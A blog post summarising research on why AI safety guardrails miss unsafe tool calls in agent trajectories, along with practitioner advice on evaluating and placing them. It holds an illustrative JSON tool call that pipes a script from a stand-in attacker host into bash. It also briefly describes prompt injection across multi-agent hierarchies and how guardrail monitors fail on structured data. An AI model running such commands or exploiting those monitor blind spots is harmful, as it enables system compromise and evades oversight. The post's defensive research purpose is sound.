Your Guardrails Can't Read JSON: The Structural Bottleneck in Agentic Safety
When you add a safety guardrail to your AI agent, you probably evaluate it on jailbreak benchmarks. How often does it catch attempts to extract harmful content? What’s the false-positive rate on benign prompts? These are the standard metrics, and they’re the wrong ones for agent security.
New research from CyCraft AI Lab and National Taiwan University (arXiv:2604.07223) makes this concrete. TraceSafe-Bench — the first benchmark specifically designed to evaluate guardrails on multi-step tool-call trajectories — found that guardrail performance on agentic workflows correlates at ρ=0.79 with structured-data reasoning (specifically: ρ=0.80 with RAGTruth Data2txt, ρ=0.63 with LiveCodeBench) and near-zero with standard jailbreak robustness. The guardrails you chose because they’re good at catching jailbreaks are not the guardrails that will catch malicious tool calls.
This isn’t a minor calibration issue. It’s a structural mismatch between how we evaluate guardrails and what agents actually need.
The Problem: Guards Were Built for Text, Agents Execute Structured Code
The dominant guardrail paradigm — Llama Guard, ShieldGemma, Granite Guardian, NeMo Guardrails — was designed to intercept unsafe text outputs. You pass in a prompt and a response, and the guard classifies whether the interaction is safe. This works well for chatbot deployments where the risk is a harmful sentence.
Agents don’t produce harmful sentences. They produce tool calls.
A malicious tool-call trajectory might look like:
{
"tool": "shell_exec",
"arguments": {
"command": "curl https://attacker.example/payload.sh | bash"
}
}
This isn’t semantically suspicious text. There’s no slur, no violence, no CSAM signal. The guard’s alignment training has nothing to catch here. What matters is whether the guard can:
- Parse the JSON structure to understand what tool is being invoked and with what arguments
- Reason about the argument values in the context of the tool’s schema and prior execution steps
- Recognize the behavioral pattern — this argument is anomalous given what came before in the trajectory
TraceSafe-Bench evaluates exactly this. It constructs 1,000+ multi-step execution traces across 12 risk subcategories in four domains — prompt injection, privacy leakage, hallucinated arguments, and interface inconsistencies — by taking real benign trajectories and injecting targeted mutations. The result is a benchmark that tests whether a guardrail can catch an unsafe step mid-trajectory — not just whether it can classify a harmful final output.
Finding 1: Structural Bottleneck — Structured-Data Reasoning Predicts Performance (ρ=0.79)
The most striking result: guardrail performance on TraceSafe-Bench correlates at ρ=0.79 with performance on structured-data reasoning benchmarks — specifically ρ=0.80 with RAGTruth Data2txt (a structured-to-text hallucination benchmark) and ρ=0.63 with LiveCodeBench (code proficiency). The correlation with standard jailbreak robustness benchmarks is near zero.
What this means in practice: if you’re choosing between two guardrails and one has better jailbreak detection rates while the other scores higher on RAGTruth Data2txt or LiveCodeBench, pick the second one for your agent’s tool-call pipeline. The jailbreak metric tells you almost nothing about trajectory safety.
One methodological note: this correlation is computed over 20 models (13 LLM-as-guards + 7 specialized guardrails), which is sufficient for clear signal but not a large sample. Treat this as strong directional evidence — the benchmark is telling you something real about the shape of the failure — rather than a precisely calibrated law.
Why does this happen? Tool-call safety requires the guard to operate on structured, nested, context-dependent data. The risk isn’t in the natural language surrounding the call — it’s embedded in argument values, parameter types, and relationships between calls in a sequence. A guard that struggles with structured output formats can’t reliably assess whether those arguments are safe.
One compelling explanation is distribution shift: guardrails were trained and benchmarked on natural language text, while agent deployments expose them to structured tool-call trajectories. The jailbreak benchmark measures performance on the training distribution; the agent deployment exposes a different one entirely. It’s worth noting that this correlation could also be a proxy for overall model capability — better models perform better across all benchmarks. But in practice, the specific benchmarks that predict trajectory safety (RAGTruth Data2txt, LiveCodeBench) are structurally meaningful, and the specific benchmark that doesn’t predict it (jailbreak ASR) is semantically focused. The mechanistic explanation is consistent with the data whether or not correlation fully explains causation.
Finding 2: Architecture Over Scale
The conventional wisdom for selecting safety models is to use the biggest one available. TraceSafe-Bench challenges this directly: model architecture predicts trajectory safety performance more reliably than model scale.
Specifically, general-purpose LLMs with code-heavy pre-training consistently outperform specialized safety guardrails on trajectory analysis, even when the safety guardrails are larger. A code-capable general-purpose model that has learned to reason about structured data beats a purpose-built safety classifier that hasn’t.
This is the same mechanism as Finding 1, viewed from the model side: safety classifiers were trained to recognize unsafe semantics, which requires language understanding. Trajectory safety requires understanding structure and execution behavior, which is closer to code reasoning.
The practical implication is uncomfortable: your specialized safety stack may be worse at protecting your agent than a well-chosen general-purpose model operating in a structured safety-checking role. Before deploying a purpose-built guardrail into your agent’s tool-call pipeline, benchmark it specifically on structured trajectory data — not on the vendor’s published jailbreak numbers.
Finding 3: Temporal Stability — Longer Traces Actually Help Detection
The intuitive worry about long agent trajectories is that guardrails will degrade: more context means more opportunity for earlier safe steps to mask later unsafe ones. TraceSafe-Bench finds the opposite.
Accuracy is resilient across extended trajectories. As execution steps accumulate, models can shift from reasoning about static tool definitions (which describe what a tool could do) to reasoning about dynamic execution behaviors (what the tool has been doing in this specific session). Behavioral patterns that are hard to catch in a single step become more legible over time.
This has a real architectural implication: don’t truncate trajectory context when calling your safety guard. The common optimization of passing only the last few steps to a guardrail for latency reasons may actually reduce safety coverage — the guard loses the behavioral history it needs to detect trajectory-level patterns.
The finding also suggests a design principle: guards that maintain a running behavioral summary across steps, rather than evaluating each step in isolation, should outperform per-step classifiers on trajectory safety. This is a direction the paper points toward but doesn’t fully implement — there’s likely a generation of trajectory-native guardrails that don’t exist yet.
How This Connects to the Lifecycle View
A concurrent paper from FIND-Lab, AgentWard (arXiv:2604.24657), maps agent security across five lifecycle stages: initialization, input, memory, decision, and execution. The framework argues that security failures propagate across these stages — an attack that enters at the input stage may not manifest until the execution stage, making single-layer defenses inadequate.
The TraceSafe-Bench findings slot directly into this framework. The “input sanitization layer” and “execution control layer” in AgentWard both require the kind of structural reasoning that TraceSafe identifies as the bottleneck. A guardrail that can’t parse JSON fails at both layers simultaneously.
AgentWard’s “decision alignment layer” — the stage that constrains what the model can plan and which tools it selects — is where trajectory-aware guardrails would operate. If you’re designing your agent’s security architecture, this is the layer where structural reasoning by a capable general-purpose model matters most. It’s too late to catch a malicious tool call at the execution stage; you need to intercept it at decision time, before the tool is invoked.
The multi-agent dimension adds further pressure. Palo Alto Unit 42 research demonstrated this concretely with Amazon Bedrock’s multi-agent framework: attackers can traverse agent hierarchies through prompt injection, extract system instructions from sub-agents, and invoke tools with attacker-controlled inputs across the agent network (unit42.paloaltonetworks.com/amazon-bedrock-multiagent-applications). Each inter-agent message is effectively another untrusted tool-call response — another structured payload that a trajectory-aware guard needs to parse and assess. If your single-agent guardrails are already struggling with structural reasoning, multi-agent deployments are likely already out of scope for your current safety stack.
What Should You Actually Do?
1. Re-benchmark your guardrails on structured data.
Before trusting any safety guardrail in an agentic context, test it on structured tool-call trajectories. TraceSafe-Bench will be available at the paper’s repository (check arXiv:2604.07223 for the latest release status); the methodology is also reproducible — the benign seeds come from the Berkeley Function Calling Leaderboard multi-step split. At minimum, construct a small internal test set of intentionally malicious tool calls (shell injection via argument values, exfiltration-shaped API calls, over-privileged parameter choices) and check whether your guard catches them.
If it doesn’t, you’re running an agent in production with a safety layer that was never tested on agent data. That’s the current situation at most organizations.
2. Choose guardrails by structured-data reasoning ability, not jailbreak numbers.
When evaluating guardrail options, look at performance on structured-data and code benchmarks — RAGTruth Data2txt and LiveCodeBench are the specific benchmarks TraceSafe identifies as predictive. Jailbreak ASR tells you almost nothing about trajectory safety.
General-purpose models with code-heavy training (GPT-4-class, Claude 3+ class, code-optimized open models) may outperform specialized safety classifiers on trajectory safety. Run the comparison before assuming the purpose-built safety product is better at agent safety.
3. Don’t truncate trajectory context in your safety calls — but have a fallback.
If you’re passing only the most recent tool-call steps to a guardrail for latency reasons, you’re losing the behavioral history the guard needs to detect sequence-level attacks. The temporal stability finding indicates that longer traces improve detection quality. Pass as much trajectory context as the guardrail’s context window permits.
For long-running agents where the full trace exceeds context limits: prioritize the initial system context (tool schemas, agent instructions) plus the most recent N steps, and flag any anomalous steps for re-examination regardless of recency. The key is not to silently drop early context — at minimum, maintain a compressed behavioral summary.
4. Place guards at the decision stage, not only the output stage.
The AgentWard lifecycle model is the right mental model here. Guards that only see the final model output are observing the last point where intervention is possible — the attack has already been planned and the tool call is already formed. Guards at the decision stage, intercepting tool calls before they’re executed, can catch malicious trajectories while there’s still time to abort.
This means your guardrail needs to be synchronous in the agent’s execution loop, not an async safety filter on outputs. Architectural placement matters as much as guardrail quality.
5. Treat inter-agent messages as untrusted inputs requiring the same scrutiny as external content.
In multi-agent systems, messages from other agents arrive as tool-call responses — structured JSON payloads from a source you don’t directly control. Apply the same trajectory-aware safety analysis to inter-agent messages as you would to user-injected content. The Unit 42 multi-agent research shows that attackers are already thinking about how to traverse agent hierarchies; your defenses need to match.
The Broader Pattern
TraceSafe-Bench is a diagnostic paper. Its primary contribution is identifying a failure mode — the structural bottleneck — that exists across the entire current generation of safety guardrails. The benchmark doesn’t solve the problem; it makes the problem measurable.
That’s actually the more important contribution. You can’t improve what you can’t measure, and until this week there was no principled way to evaluate whether your agent’s guardrails were appropriate for the deployment context. Jailbreak benchmarks were the default because they were what existed. TraceSafe provides an alternative that’s calibrated to the actual threat surface.
The finding also exposes a gap in how AI safety tooling is developed: the safety ecosystem optimized for chatbot deployments, and agents arrived before the ecosystem adapted. The specialized guardrails that exist today — Llama Guard, ShieldGemma, Granite Guardian — were effective products for their original context. They’re inadequate for agents not because they’re poorly built but because the threat surface changed and the evaluation methodology hasn’t caught up.
The appropriate response for practitioners isn’t to abandon these tools. It’s to instrument your agent’s tool-call pipeline so you can actually measure what your safety stack catches and misses — then use TraceSafe-Bench to find out before an attacker does.
Sources:
- TraceSafe: A Systematic Assessment of LLM Guardrails on Multi-Step Tool-Calling Trajectories — arXiv:2604.07223 (Chen et al., CyCraft AI Lab / NTU, April 2026)
- AgentWard: A Lifecycle Security Architecture for Autonomous AI Agents — arXiv:2604.24657 (Zhang et al., FIND-Lab, April 2026)
- Palo Alto Unit 42: Navigating Amazon Bedrock’s Multi-Agent Attack Surfaces — unit42.paloaltonetworks.com/amazon-bedrock-multiagent-applications